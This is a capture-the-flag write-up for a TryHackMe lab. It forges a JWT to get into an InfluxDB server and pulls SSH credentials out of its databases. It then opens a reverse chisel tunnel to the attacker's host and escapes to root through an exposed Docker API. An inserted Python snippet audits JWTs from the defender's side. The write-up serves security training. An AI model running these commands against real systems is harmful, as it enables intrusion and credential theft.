Sweettooth Inc.

https://tryhackme.com/room/sweettoothinc

User Flag

Let's start with an nmap scan

Googling about InfluxDB we found something interesting in the following blog:

If we go to the /debug/requests path we can find a username for the database.

Now we have to generate a JWT (https://jwt.io/). The exp field is the token expiration date in epoch format (seconds since 1970-01-01 UTC).

Let's see if the token works:

curl -G http://10.10.62.99:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "q=SHOW DATABASES"

It works.
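To make the previous step concrete from the defender's side, here is an added example (not part of the original writeup) that inspects the bearer token used above. InfluxDB 1.x validates bearer tokens as HS256 JWTs against the shared-secret value in the [http] section of its config, so the audit decodes the header and claims without trusting them, reports whether exp has passed, and checks which key the signature actually verifies under. A token that verifies under an empty key is a sign that the server's shared-secret is unset. The token string is the one from the curl command above; the key "k" and the username "alice" in the usage block are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
from datetime import datetime, timezone

# Token copied from the curl Authorization header in the writeup above.
WRITEUP_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ."
    "Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A"
)


def _b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def inspect_token(token: str):
    """Return (header, payload) WITHOUT verifying the signature: inspection only."""
    header_b64, payload_b64, _signature = token.split(".")
    return (json.loads(_b64url_decode(header_b64)),
            json.loads(_b64url_decode(payload_b64)))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build an HS256 JWT (InfluxDB 1.x expects the claims 'username' and 'exp')."""
    h = _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    return f"{h}.{p}.{_b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes) -> bool:
    """Constant-time check that the token's signature was produced with `secret`."""
    h, p, s = token.split(".")
    expected = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(s))


def is_expired(payload: dict, now: int) -> bool:
    """True when the 'exp' claim (epoch seconds) is at or before `now`."""
    return int(payload.get("exp", 0)) <= now


def audit_token(token: str, shared_secret: bytes, now: int) -> dict:
    """Defender-side summary of a bearer token presented to /query."""
    header, payload = inspect_token(token)
    return {
        "alg": header.get("alg"),
        "username": payload.get("username"),
        "exp_utc": datetime.fromtimestamp(payload["exp"], tz=timezone.utc).isoformat(),
        "expired": is_expired(payload, now),
        # Verifying under an empty key means the server-side shared-secret is unset.
        "signed_with_empty_secret": verify_hs256(token, b""),
        "signed_with_configured_secret": verify_hs256(token, shared_secret),
    }


if __name__ == "__main__":
    now = int(datetime.now(tz=timezone.utc).timestamp())
    # The writeup's token, audited against a constructed (hypothetical) secret "k".
    print(json.dumps(audit_token(WRITEUP_TOKEN, b"k", now), indent=2))
    # A constructed token that should pass under "k" and fail under an empty key.
    demo = sign_hs256({"alg": "HS256", "typ": "JWT"},
                      {"username": "alice", "exp": 2000000000}, b"k")
    print(json.dumps(audit_token(demo, b"k", now), indent=2))
```

The decoded claims of the writeup's token show why the exp value matters: once exp is in the past the server rejects the token regardless of the signature, and a properly configured, non-empty shared-secret makes the "signed_with_empty_secret" check come back False for every token the server accepts.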

Now we have to extract the data we are asked for:

#List the tables on the tanks database
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=tanks" --data-urlencode "q=SHOW MEASUREMENTS"
#Get data from the water_tank table
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=tanks" --data-urlencode "q=SELECT * FROM water_tank"

#List the tables on the mixer database
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=mixer" --data-urlencode "q=SHOW MEASUREMENTS"
#Get data from the mixer_stats table
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=mixer" --data-urlencode "q=SELECT * FROM mixer_stats"
#To get the max RPM we use this query
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=mixer" --data-urlencode "q=SELECT max(motor_rpm) FROM mixer_stats"
#List the tables on the creds database
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=creds" --data-urlencode "q=SHOW MEASUREMENTS"
#Get data from the ssh table
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=creds" --data-urlencode "q=SELECT * from ssh"

Let's ssh into the machine using the creds we found and grab the flag.

Root Flag

Looking around the machine we found a script named "initializeandquery.sh" in the / folder. If we cat the file we see this output:

We can do a port forward and access that 8080 port from our machine.

Let's upload chisel to the victim machine.

Let's set up a chisel listener in our machine:

sudo chisel server --reverse --port 9001

In the victim machine:

./chisel client 10.11.36.103:9001 R:8003:127.0.0.1:8080

Now we can list the Docker images through the forwarded port:

DOCKER_HOST=tcp://IP:8003 docker image ls

Because the Docker API is reachable, we can start a container with the host filesystem mounted at /mnt and chroot into it, which gives us a root shell on the host:

DOCKER_HOST=tcp://IP:8003 docker run -it -v /:/mnt --rm influxdb:1.3.0 chroot /mnt sh

Let's upgrade the shell and grab the flag.

Root Flag (Docker)

For the Docker root flag we listed the containers.

Then we executed the following command to get the root flag from the Docker container:

docker container exec -it sweettoothinc cat /root/root.txt
